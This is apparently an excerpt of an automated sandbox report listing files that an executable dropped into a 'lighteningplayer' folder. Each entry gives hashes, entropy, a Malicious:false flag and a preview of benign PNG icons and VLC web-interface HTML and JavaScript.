                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:KsMWnsDBThvfQrA13Lfsq9/tArO6NXpWe7xs6K:TMWnsDBThv1ZnO9R5i6K
                                                                                                                                                                                      MD5:C9D3C069A660E0AE1DC8DA905C8D8C4B
                                                                                                                                                                                      SHA1:A4F202528D7D36569448FDDB2CF32CBC63C798B5
                                                                                                                                                                                      SHA-256:3C6CF8B87AD6453BF0D0629893CBE4D0196A3B28E9036B7CC6F19C0168325137
                                                                                                                                                                                      SHA-512:7066EBB6B086759C5F3991B034097E92201ED5B640A20A3F2DD591462243E181BD685CCFAA7E6DCBB7F4355B45340D53B665B575CC1FE82C2EE10228A145CB2B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR... ... .....szz....uIDATX..W.O.Q.....-...m)......k".@..4...W../z..M....A...x.X..x..$p.....v...]..@.Bi_UJL.d.}..|o.7S..r..H$....>..x<...w.,{..n..x:..........4..v. .-...S....%..hpp....M.1..LFp..a.Om.............MD..4."y.K. .(...i...d..2.e.Z....Vmv...v.w9...<..x.{.....j.....Je+.L>b.s..R6.},..@ ...a..H.9...rea.aO!...dE!..H...{..#..D..."wr......^...NE.X(.b.V...L.X....P"..C.I.....(..o.N.yc..@8...p.$Qj....`..!.hll.;.hM..q].$i.C>..X..NO.,.-...`a.|.R.q...9.........C...`8).A.?.)X<.V.Rj<...B..B..R4.....u.e.%.F..~.H.....`..Ad.&Y..........pb.e.Z.F..]..\.*.2Y...........]>-.......D."..pe..i...`......D.Ml.......*Vz...W.....=./. ..U+B...lK....R..k'&N.m.M..22...........b..........>..fls.8".ib.\.^...M.g...K1j......O..a,.y.E.'QI..^.......F...H..+(F....X4..c.....@A.>.VC./...y.z.!A...j.T.y.x.u.NO.s.....4.hD.T...`P.H...+F...G>..... _.......t.`dd....F4.I.#.Q...@.7..._..J~..)....Z\....IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15875
                                                                                                                                                                                      Entropy (8bit):7.973702300459294
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Ru2xCGZC+RcEmg3qfQ2lWI57+5ne5ipqOoYW9fu:7wGZC+yEmfIs/g9pqvYWtu
                                                                                                                                                                                      MD5:4BC61FC36DFE84F904218699C1E6C6DA
                                                                                                                                                                                      SHA1:E61EB558E07C26CB8ACD78C9E4F5A9BA58565D4A
                                                                                                                                                                                      SHA-256:731D5A34A98FEE76F9E1AACAA524B3E0ED0CF0ECAC3E2F9E2703B38C4A4BC518
                                                                                                                                                                                      SHA-512:A11F54209A9F3367D22ACEAE3568C1672B67C6192ADD4C59772EBCE6503B6ABFBB9E2BA79C16DC60991471A466B2A2014BB634C336C69A96F3E9CB7F9E48917B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR..............>a...=.IDATx..}g.\.u.y.sO....0........v%.. ......r.%..V.TeW..T.K.r.d.T.T4..?..T..(Q..R..E..i2&..L....9...}...,.0....=....=.;....1...{..S.].w..-.}....tM..AQ.`....?.d.6TJ9.6.Cqu....A.&.1{.|AI.a.......t8,.Zb....^....6Hr......&{....P.Z_......{..~o.!...JJ.4X......+.d........9....1..N?H...aI.$Xf.Q...t.3.+......<.!..(...$+.6;..Rma.......a..`.h..}..4.d.o..%....e....[.0* ...~o}C.*:...w....m...qH...S_.I2......9...e..X....:...H_I.$c.t.W....T..G._.;...c......Lt...._....:.R.=^..8.......>...2xC."......td..G...|...R.O.G8..wG.....aO.......d..#.c$t...\*.. .{.J ....z..>.ZY..C..G5.... .f'.(.N..3.O.h>.R.....z.Y..K..H..8.(....2.._..N.Z[n>.a..V.Z.P....g..I.,VZ.l..P.j/2..'.g....k.P....@..0..|.SF).y..H........"..E.s..?4w;W.)t.mZ.~..Q..7.9r...=N.@..1C.s.'..LJH]......?.Z.B....Pz..=..x..1......&....?.....#.k...g.P...x......G_*I..Q....b.R.H.#H......!..=.P........?&+.+.Z|W.j.m.<.....w.b..Kl .q.'l.t..>...K..$.!/.fJ.aL.UM.<jQ......R.......(.Ke.R.|
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):606
                                                                                                                                                                                      Entropy (8bit):7.567318743599164
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:6v/7B8y21ceRnIuKz2J494gVGLiZQrQc3Fx4T7jgrz:E8Mud49PVGLi6UYMT7jgP
                                                                                                                                                                                      MD5:28219046AA007A04696D0DE017BC7691
                                                                                                                                                                                      SHA1:5208AB4FE4FB80EA154B4DD4AFC6BC59EEC34044
                                                                                                                                                                                      SHA-256:32030A3D8E8FA75BD89EAD94C429F2C3418944D9AA3D1029294B4AF99264F5C5
                                                                                                                                                                                      SHA-512:CC165721FD0430532A3F838C8DE8E83BD7501B1E889A0003A979EE81890C67632522AF779CA0A63A854B370838C5BF792BE0F7ADA82E77E629C523220B1EEB4D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR................a...%IDAT8O..MH....._...F.?.E.Q....... ..7[...Ck[.X.,.L...e.)....c9.:'Y.l.4.\.9...>]d..m...y...Z(..u...h.....>!..pd.....$.;qg....P.2.q.O...O^8.=Pit...*%[g..|...{..}..L.\.3..\.>G}.>Z..6.R..g....h>..U@..."R.?....*&.....C4.@...3RBPB0....6&..(.[..E.Q.]_..%6.....N..[..S..<u.8...7.mVt.9..c.......j.+.J.7u.M............B.\K....C...a.......K.*.g.....+i.....).wY.}f2z.r.k.....}.....:..hLO.i.aP.......$1,_5.O.. .O..r.>....& t...&....s........(.2..G*..rB....'.y.@.!( L....p!.0[K.q^K....;d02....3@.|.....4.e.6.hg.[jE.0.f.ve..........". .....IEND.B`.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\index.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14198
                                                                                                                                                                                      Entropy (8bit):5.29971961065969
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:U+HKKXP1aA032NiAnWStiKruUnfpNdypPmF6s92BEiu/Jh:U+HKKXP1aAuST00/3
                                                                                                                                                                                      MD5:4C2A90D98707DD34894A208B8C335FB5
                                                                                                                                                                                      SHA1:B728A97174126D5CD8E8E955548DE3F6FC476204
                                                                                                                                                                                      SHA-256:A63394CF98836A0616FBBBDA0C60E7BEEFA4490126C427C9B22E2B1820173DBD
                                                                                                                                                                                      SHA-512:40C698EDB4CECD8C0279BA9EECA36C5788F55E84E7DFE169DB2860ECA995DEA2A71575D41E09B00D65309D6499ABFF5269E4E29EA3CBE73F72B2B39072BE9B7E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< index.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU Ge
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5195
                                                                                                                                                                                      Entropy (8bit):5.1368738862657395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:dsCejmDgHdEf7TbFILjW2fd+dla+KYrtJxto5lGDWtVARrV74ErE5EfP01Z2mp:lBCdEf7TbFIv1fd+dllKYrtlo5lurVcz
                                                                                                                                                                                      MD5:B6A6845D1F74559C55A83040C9426939
                                                                                                                                                                                      SHA1:CA0BE71F319959342CB161ACA0E280950FA17F63
                                                                                                                                                                                      SHA-256:47CAD1DBDE4AD4D5EEE0A7306C7E20DF3F2A080A986CAC5693C50B8FF1434B27
                                                                                                                                                                                      SHA-512:FBAB1598ED06590F5DFDCFAA1F76C14DA5D3D0E517A21F43D186509E9107515310F07DD41F1FE6E7979C7B841CBA55962EF8DA765E5B56B941326F9BE5A1A0EB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: var intv = 0;..var ccmd = "";..var video_types = [.. "asf", "avi", "bik", "bin", "divx", "drc", "dv", "f4v", "flv", "gxf", "iso",.. "m1v", "m2v", "m2t", "m2ts", "m4v", "mkv", "mov",.. "mp2", "mp4", "mpeg", "mpeg1",.. "mpeg2", "mpeg4", "mpg", "mts", "mtv", "mxf", "mxg", "nuv",.. "ogg", "ogm", "ogv", "ogx", "ps",.. "rec", "rm", "rmvb", "rpl", "thp", "ts", "txd", "vob", "wmv", "xesc" ];..var audio_types = [.. "3ga", "a52", "aac", "ac3", "ape", "awb", "dts", "flac", "it",.. "m4a", "m4p", "mka", "mlp", "mod", "mp1", "mp2", "mp3",.. "oga", "ogg", "oma", "s3m", "spx", "thd", "tta",.. "wav", "wma", "wv", "xm"..];..var playlist_types = [.. "asx", "b4s", "cue", "ifo", "m3u", "m3u8", "pls", "ram", "rar",.. "sdp", "vlc", "xspf", "zip", "conf"..];....var stream_server = window.location.hostname;....function format_time(s) {.. var hours = Math.floor(s / 3600);.. var minutes = Math.floor((s / 6
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23980
                                                                                                                                                                                      Entropy (8bit):4.31324933873002
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:V5jsO7zZGzqPec9x/h8Duxud79RtEZRtykbcJJznPeJdHsEyET+v55:dGlc9x/h8Duwd7H1JJaJdHsEpT+v55
                                                                                                                                                                                      MD5:6DF272C965A86E52FB88145DCE2C6394
                                                                                                                                                                                      SHA1:E940E2E7FD22B3B6CC6F0D10E1C9EDC97C23C158
                                                                                                                                                                                      SHA-256:CDFD0EEEE6A015D28F60B68C7C9F4F49461F40CC16508AE90EF526D918E5E3B3
                                                                                                                                                                                      SHA-512:4EE96D6B0EF6992D56E196D906854E3E38B8C340B41512E235DBCE817B30F7E3B0FDBE6D59DCE131079705B5521B1BA6DDA4C040E650489B2FA06CA8C565DC72
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: var currentArt = null;..var current_que = 'main';..var current_playlist_id = -1;..var previous_playlist_id = -1;....function updateArt(url) {.. $('#albumArt').fadeOut(500, function () {.. $(this).addClass('hidden').removeAttr('height').removeAttr('width').attr('src', url);.. });..}....function updateStatus() {.. $.ajax({.. url: 'requests/status.xml',.. success: function (data, status, jqXHR) {.. if (current_que == 'main') {.. $('.dynamic').empty();.. $('#mediaTitle').append($('[name="filename"]', data).text());.. $('#totalTime').append(format_time($('length', data).text()));.. $('#currentTime').append(format_time($('time', data).text()));.. if (!$('#seekSlider').data('clicked')) {.. $('#seekSlider').slider({.. value: toFloat($('position', data).text()) * 100.. });.. }.. $('#currentV
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):184460
                                                                                                                                                                                      Entropy (8bit):5.113633243942571
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:Fvjw57nI+7XpvJSwaLG6SDvG76od804VUeEKSO2KWLXd8ZF5DypcyvoZJ4NPwWA3:FvU51SKLVU9KSU8XODQRvn5w9D4R398
                                                                                                                                                                                      MD5:F40F5C163A208E32B2D0E189D5774E7E
                                                                                                                                                                                      SHA1:46AE8556AC9C6272761548A32C8F8F2383B919B8
                                                                                                                                                                                      SHA-256:1A352E095A65F22AF44DBE91E79B2FC21989CC53C7CECB157312184F44F7B5DE
                                                                                                                                                                                      SHA-512:EA0B2FED151E37B403AD4AA44F70378027934EC3566F4A0A80FBED73851FFA9850B3101730A58C2D36FFB0CBCB3FAC950058B9CAE63D2EF5B11890B8E94CB6EC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: /*.. * jsTree 1.0-rc3.. * http://jstree.com/.. *.. * Copyright (c) 2010 Ivan Bozhanov (vakata.com).. *.. * Licensed same as jquery - under the terms of either the MIT License or the GPL Version 2 License.. * http://www.opensource.org/licenses/mit-license.php.. * http://www.gnu.org/licenses/gpl.html.. *.. * $Date: 2011-02-09 01:17:14 +0200 (.., 09 .... 2011) $.. * $Revision: 236 $.. */..../*jslint browser: true, onevar: true, undef: true, bitwise: true, strict: true */../*global window : false, clearInterval: false, clearTimeout: false, document: false, setInterval: false, setTimeout: false, jQuery: false, navigator: false, XSLTProcessor: false, DOMParser: false, XMLSerializer: false*/...."use strict";....// top wrapper to prevent multiple inclusion (is this OK?)..(function () { if(jQuery && jQuery.jstree) { return; }...var is_ie6 = false, is_ie7 = false, is_ff2 = false;..../* .. * jsTree core.. */..(function ($) {...// Common functions not related to jsTree ...// decided to m
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4044
                                                                                                                                                                                      Entropy (8bit):4.398172546078367
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:50cgIjnyj0pBMUsMsQSMS3xRY2Q8K5Q8eSkz64IUAtFCmW05u4ilWlrhWdCv10lF:5ZRWiIZePmTzt3MTEIrhWdCv6lSk
                                                                                                                                                                                      MD5:6A465D7CD488589803B338702E6EB17A
                                                                                                                                                                                      SHA1:D7677FCBA7199E24D166DF165809E7C479C069DD
                                                                                                                                                                                      SHA-256:94032A9C52559E21F0201284902C4B9B04D7605E665C750327DB9ABAEF71E544
                                                                                                                                                                                      SHA-512:EA3C287A801BB1137C60FFBEBE160A1047E42CFD8FD694DA241E645216D60F26A809BF9087748BB037AF880B6DD88F6CA05C2A84D9CC6F9A70B40F188D3787ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: $(function () {.. $("#seekSlider").slider({.. range: "min",.. value: 0,.. min: 0,.. max: 100,.. start: function (event, ui) {.. $("#seekSlider").data( 'clicked', true );.. },.. stop: function (event, ui) {.. $("#currentTime").empty().append(format_time(Math.round((ui.value / 100) * $('#seekSlider').attr('totalLength'))));.. switch (current_que) {.. case 'main':.. sendCommand({.. 'command': 'seek',.. 'val': (ui.value) + '%'.. });.. break;.. case 'stream':.. sendVLMCmd('control Current seek ' + ui.value);.. break;.. }.. $("#seekSlider").data( 'clicked', false );.. }.. });.. $("#volumeSlider").slider({.. range: "min",.. value: 50,.. min: 0,.. max: 100,.. start: function (event, ui) {.. $("#vol
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5360
                                                                                                                                                                                      Entropy (8bit):5.307361958508565
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zS6Zi3y9+k0y4Hfyt1YPZ44URXIpQq2widzUiOzPHTjVq74rrhkKfJtdBtlyJpIH:SkEfyth6dzXrtfPFLhX5xj/wL/R8
                                                                                                                                                                                      MD5:F193295D687ACB2A49C8E00FC31A2C1F
                                                                                                                                                                                      SHA1:E4BC4A8F508F6C4AE6BF6EDC1A7A0F6A723F659E
                                                                                                                                                                                      SHA-256:DA4A1C9CD4E16D581F4DA4DA502EAEC9ED9608885F5A472F84FA14E0088EFE3A
                                                                                                                                                                                      SHA-512:E57285E315D17A48847AAF8823CF86AC8440E04D8910336CA7C4474452D18319D87442055B0AE952E070B29F904BDE31B6BFE6F47D977641E2D1893B708450B9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Foundatio
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2444
                                                                                                                                                                                      Entropy (8bit):5.197808383249536
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zd6Zi3y9+k0y4Hfyt1YPZD2qRIq2widzUioAzPHTjVqkKjyPB8jw:hkEfytQVuzeUGU
                                                                                                                                                                                      MD5:029FD5BAB64336366CF2A73C5EEA8CC8
                                                                                                                                                                                      SHA1:5F7653938FCDAFEDDC917148F04827CAD2F7FC07
                                                                                                                                                                                      SHA-256:F26665F543CBC3EF75C65A0F7749BD9287738233EE47D302177C57412BB1128B
                                                                                                                                                                                      SHA-512:3ED836E4B7C957AF3A6538BAFA355FDDA5AC681C4F67F0582F7BB21FEBE33B02A5B2A4A3A2901B72CB2F6EF5D0403F64C408C9429E9102B947D13FF37EE5F6F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile_browse.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Fo
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2917
                                                                                                                                                                                      Entropy (8bit):5.2958269405515965
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zX6ZTy9+k0y4Hfyt1YPZD2qR5uq2widzUioAzPHTjVqkKEwh4TP+kIgwNDbPs5gR:IkEfytQRuzeMwl84lFJj
                                                                                                                                                                                      MD5:F85830B0F0B962B8F55ECF1D40458764
                                                                                                                                                                                      SHA1:ADDB7CBCF05A430AF403D9028E6AA40D9D25E0E9
                                                                                                                                                                                      SHA-256:01BFC0624327C47CE84CA3E30A201E91E7411D708105E77E7811FC66D2E6A74E
                                                                                                                                                                                      SHA-512:ABDABEE66BD9E3F2504F06AC23C65D6AC471F3DB22AB89C1359C2D698EB82B6610906563800FEFEC6BE479F392A588C92CCDD286188075D5237167DE25BA42DA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile_equalizer.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Founda
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2840
                                                                                                                                                                                      Entropy (8bit):5.297682048931486
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zA6Zi3y9+k0y4Hfyt1YPZD2qR5u+2widzUioAzPHTjVqkhKYriHN4rDMt4lwoNeb:QkEfytQPuzkqiHWrXgb
                                                                                                                                                                                      MD5:6710285ADE2CE9718E59CF3A7E30BA64
                                                                                                                                                                                      SHA1:008160D49ED4395974A16547B69F3823986A4170
                                                                                                                                                                                      SHA-256:AB62EA350CE7FCEFFAD01786ACE1DDCE3D5CD5C5231047356C9550711F215C8A
                                                                                                                                                                                      SHA-512:F806FC8D21CAA7DE8FBD567012BD3DFAD185545D8C298CB56ADE3B2499343B53FC58DE0AA7527406062E8363A6347BA6DA966DFC76C525F3626A880FB53B0CE1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< mobile_view.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Foun
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5478
                                                                                                                                                                                      Entropy (8bit):4.9381892672605625
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:jMpnnCLuR9ZNdBsLZtyjogPAbF5ryb47zRl1QEn3c3eOR1hy/5BT/3ZGIab:jMniuR9DW3yj5AbF5rybez3dYI/5d/3S
                                                                                                                                                                                      MD5:3080834D2AEF61EECABA69B4112FB68C
                                                                                                                                                                                      SHA1:8D18104717CF528E22232F907A259C2A53EB4381
                                                                                                                                                                                      SHA-256:9E398F65B56CA09B0D41CBB5B788A8554B97B7C0CA2464BCB778371FCE95D625
                                                                                                                                                                                      SHA-512:DB658779B6886C3CCB2498808D74C331C2A1CBDAC4C8A9B3A35963AEAFF7A070A93636E423566BEF0805436F81B07285F98882B51E5F68A6D208B84C2AF1C562
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: $Id$....This file describes commands available through the requests/ file:....Lines starting with < describe what the page sends back..Lines starting with > describe what you can send to the page....All parameters need to be URL encoded...Examples:.. # -> %23.. % -> %25.. + -> %2B.. space -> +.. .........Deprecation Notice:..---..The entire interface is moving to using <MRL> for input and output parameters and attributes..pl_play and in_enqueue previously accepted paths. This is still supported, but from 1.3 <MRL> will be required..where path attributes are provided in output, these should be ignored in favour of uri attributes..path support is scheduled to be removed entirely from 1.3..---....<root> (/)..===========......> Get album art for current input:.. /art (NB: not /requests/art)....> Get album art for any playlist input (available from API version 3):.. /art?item=123 (NB: not /requests/art)......status.xml or status.json..===========......< Get VLC status information, curre
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:exported SGML document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                      Entropy (8bit):4.825017063253334
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:c2PbTUAA0fzRH2xZ/zhA1yRfOkHiluTbV2B+vDUYWCWmWcnWLWvbY+:c2PbwAVVW3zsyRJHiro/RR7nMKbY+
                                                                                                                                                                                      MD5:02A74626B57096A4F4F9DD77EBCBCDAE
                                                                                                                                                                                      SHA1:7DCC7AE4C60914DE9C34E8F6DA3DEDA286DE44A9
                                                                                                                                                                                      SHA-256:48D81D125C75148BBC3CE3C7B19152E734F5307B5B4B380688095A5E813E836B
                                                                                                                                                                                      SHA-512:7CEF62381AF33C019F3C7469D6F67C8CF7D46A1D41DF0B3F21BF06A6600AC1A89A6928537BB696BD71CB457E0369FA1A8B2A56C7D8BD4FCBC32C985ACA3B411E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?vlc --[[.vim:syntax=lua. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< status.xml: VLC media player web interface.< this should mirror the content and function of status.json.< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< Copyright (C) 2005-2009 the VideoLAN team.< $Id$.<.< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>.<.< This program is free software; you can redistribute it and/or modify.< it under the terms of the GNU General Public License as published by.< the Free Software Foundation; either version 2 of the License, or.< (at your option) any later version..<.< This program is distributed in the hope that it will be useful,.< but WITHOUT ANY WARRANTY; without even the implied warranty of.< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.< GNU General Public License for more details..<.< You should have received a copy of the GNU General Public License.< along with this progra
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1758
                                                                                                                                                                                      Entropy (8bit):5.043702252839312
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ctJzSbUZXnE9+Y0y4Hf21YPV0Ot3nnCVKbYxaZBA:OVYEf2zOt3nn4K8xaZBA
                                                                                                                                                                                      MD5:70AA9A1262BE64C92F70D649498ABEBD
                                                                                                                                                                                      SHA1:A9A160F1CB6035271D6DCF820B5EF9D86BA50F00
                                                                                                                                                                                      SHA-256:66E21AD81541F4B1B405768B77EBBAD54F1D9D735AD07EBB7258D741301A239D
                                                                                                                                                                                      SHA-512:002AE525B966B2540642F23FAC9E2764C53D77985A9FF331E3E8D1A7CB448130B1287A8F237E3EC6875101EFA685082AE579C88B49710A99FF664E30C4454206
                                                                                                                                                                                      Malicious:false
